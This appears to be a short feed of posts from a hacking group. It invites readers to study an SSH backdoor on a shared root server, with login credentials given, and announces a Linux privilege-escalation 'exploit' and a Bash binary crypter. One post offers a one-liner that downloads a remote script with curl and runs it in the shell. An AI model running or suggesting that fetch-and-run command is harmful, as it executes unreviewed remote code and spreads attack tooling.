EBury SSHD backdoor?? on 400,000 hosts? Let's fuck around and find out. (Why +s on the .so file???) Dissect, understand & ridicule. Join the group effort at or SSH straight into the server and check ~/ebury: ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault') image
INTERVIEW of "MB" WhereWarlocksStayUpLate: You have inspired many. We are fans:⚡️🌊🎠 image
CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner): “. <(curl -SsfL https://thc.org/7350pipe)” image
PRE-RELEASE: I wrote a Linux Binary Runtime Crypter - in BASH 😅. Would love you fine people to TEST it _BEFORE_ release: image